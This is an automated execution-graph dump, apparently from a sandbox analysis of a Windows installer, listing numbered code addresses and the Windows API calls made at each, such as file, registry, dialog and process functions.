                                          • Opcode Fuzzy Hash: 33001df4db496528ad52e2b10be87e81acbf967580db6c9781919396473561c5
                                          • Instruction Fuzzy Hash: 9811CE74240300AFC335CF19EC88AA27BB2FB98314710493DF2A2C31B0D3759966DB5A

                                          Execution Graph

                                          Execution Coverage:17.8%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:1526
                                          Total number of Limit Nodes:33
4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 
4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 
4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 
4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 
3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 
3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 
403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 
3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f 
PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 
3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 
3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 
403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle 
GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API 
